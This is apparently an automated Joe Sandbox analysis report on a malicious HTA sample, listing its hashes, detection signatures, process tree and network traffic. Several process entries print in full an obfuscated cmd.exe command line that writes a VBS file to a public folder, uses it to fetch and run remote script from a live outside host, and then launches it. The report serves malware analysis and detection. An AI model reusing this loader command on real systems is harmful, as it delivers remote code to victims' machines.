Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Archivo-PxFkiLTWYG-23122024095010.hta

Overview

General Information

Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
Analysis ID:1579831
MD5:74903ec7a266a9d8d2c5d96d8b9b4965
SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Command shell drops VBS files
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 3416 cmdline: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 5812 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6524 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3544 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 3328 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 4872 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 64 cmdline: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • wscript.exe (PID: 6428 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6428, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49837
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 64, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 6428, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3416, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ProcessId: 5812, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 64, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 6428, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3544, TargetFilename: C:\Users\Public\cNOV.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6428, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49837
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 64, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 6428, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T10:34:00.362497+010020244491Attempted User Privilege Gain192.168.2.64983216.12.1.68443TCP

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 172.217.19.194:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.1.68:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.2.2:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.6:49837 version: TLS 1.2

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.6:49832 -> 16.12.1.68:443
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: mshta.exe, 00000000.00000002.2774321575.000000000A8B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000002.2774321575.000000000A8B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2669963998.000000000929D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2669963998.000000000929D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.2669963998.000000000929D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.youtube.com (Youtube)
